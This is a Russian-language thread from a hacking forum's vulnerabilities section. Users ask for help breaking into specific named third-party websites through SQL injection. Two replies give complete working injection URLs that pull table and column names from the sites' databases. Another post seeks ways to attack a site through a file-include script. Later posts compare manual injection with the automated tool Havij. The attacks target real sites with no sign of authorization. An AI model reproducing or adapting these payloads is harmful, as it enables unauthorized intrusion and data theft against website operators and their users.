HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.07.2010, 18:08
haito
Новичок
Регистрация: 27.05.2010
Сообщений: 13
С нами: 8399502

Репутация: 0
По умолчанию

Цитата:
Сообщение от попугай  
Нажми Ctrl+U на клавиатуре и посмотри.
Press Ctrl+U on your keyboard and see
Благодарю вас, это работа
 
Ответить с цитированием

  #2  
Старый 10.07.2010, 18:44
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
С нами: 9129884

Репутация: 240
По умолчанию

Цитата:
Сообщение от happygirl  
Пожалуйста, помогите мне, как добраться таблиц и столбцов с этого сайта. Я не могу использовать синтаксис union_
http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27
0_о не понял в чем проблема?

http://www.canal.qc.ca/recherche.php?type=domaine&domaine=2%27+union+sele ct+1,2,3,4,5,concat_ws%280x3a,table_schema,table_n ame,column_name%29+from+information_schema.columns--+
 
Ответить с цитированием

  #3  
Старый 10.07.2010, 20:26
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами: 9157119

Репутация: 74
По умолчанию

Привет.

Есть сайтик. На шаред хостинге стоит, в другой стране. Работает под управлением самописного движка (сорцев нет).

На сайтике есть один скриптик. Его вызов таков:

http://site/lol.php?p=name

этот скрипт инклюдит файл /pages/name.php (".php" подставляется автоматом).

Еще знаю путь к PHP (мне так кажется, выглядит как /usr/local/nf/php5/lib/php).

Еще кое что есть.

Скриптик, который как-то хитро выполняет запрос. Ему подставляешь число, а он делает выборку из базы (SQL) и выдает ссылку на файл. Если подставить ему, например, -1 в качестве номера, начинает срать кирпичами. Ничего особого там нет, если не считать полного раскрытия путей.

Что можно сделать, дорогие эксперты?

Спасибо.
 
Ответить с цитированием

  #4  
Старый 10.07.2010, 20:52
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию

По той информации, что ты предоставил, судить о наличии уязвимостей не возможно.

Либо задавай вопрос конкретнее, либо читай статьи.
 
Ответить с цитированием

  #5  
Старый 11.07.2010, 05:40
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами: 9709737

Репутация: 88
По умолчанию

Помогите плиз сформировать строку иньекции, а то с выводом даже ошибки, а что-то ничего не прокатывает (

http://www.noracom24.eu/image.php?w=200&h=120&id='
 
Ответить с цитированием

  #6  
Старый 11.07.2010, 06:08
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

Цитата:
Сообщение от AKYLA  
Помогите плиз сформировать строку иньекции, а то с выводом даже ошибки, а что-то ничего не прокатывает (
http://www.noracom24.eu/image.php?w=200&h=120&id='
Код:
http://www.noracom24.eu/image.php?w=200&h=120&id=1+and+1=2+union+select+group_concat%28table_name%29+from+information_schema.tables+where+table_schema=database%28%29+--+
там в картинке выводится
 
Ответить с цитированием

  #7  
Старый 11.07.2010, 06:24
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами: 9709737

Репутация: 88
По умолчанию

Seravin

Сенкс, даже не подумал что так может быть...мда тут по ходу никак не поработаешь автоматизировано с ней, с таким выводом (
 
Ответить с цитированием

  #8  
Старый 11.07.2010, 14:33
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

не знаю как вы но я никогда не использовал программы чтобы найти или автоматически раскрутить скул,

от этого одни минусы

1. вы не осваиваете sql инъекцию хорошо

2. вы доверяете программу которая может ошибиться

3. и этот взлом даже не можете считать вашим (это чистое мнение)

однажды я раскрутил скул до паролей, походу было два запроса и поэтому немного потрудилась над колонками..

потом скул даль программу havij которая считается крутой тулзой,и программа не смог раскрутить скул

sql инъекции бывают такими разными что программно раскрутить все это не реально(я так думаю)

вообщем дело ваше, простите за оффтоп(если это оффтоп)
 
Ответить с цитированием

  #9  
Старый 11.07.2010, 14:48
Boa
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами: 8395840

Репутация: 5
По умолчанию

/showpost.php?p=2243635&postcount=14262

Актуально.

Konqi, иногда надоедают однотипные действия) Хотя самостоятельно лучше, да.
 
Ответить с цитированием

  #10  
Старый 11.07.2010, 15:35
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

Цитата:
Сообщение от Konqi  
не знаю как вы но я никогда не использовал программы чтобы найти или автоматически раскрутить скул,
от этого одни минусы
1. вы не осваиваете sql инъекцию хорошо
2. вы доверяете программу которая может ошибиться
3. и этот взлом даже не можете считать вашим (это чистое мнение)
однажды я раскрутил скул до паролей, походу было два запроса и поэтому немного потрудилась над колонками..
потом скул даль программу
havij
которая считается крутой тулзой,и программа не смог раскрутить скул
sql инъекции бывают такими разными что программно раскрутить все это не реально(я так думаю)
вообщем дело ваше, простите за оффтоп(если это оффтоп)
когда тебе нужно просмотреть кучу баз и кучу таблиц, то ручками ты потеряешь довольно много времени, ну а если это можно сделать программно, то зачем же его терять? если программно не получилось, то тогда да, нужно уже руками делать
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...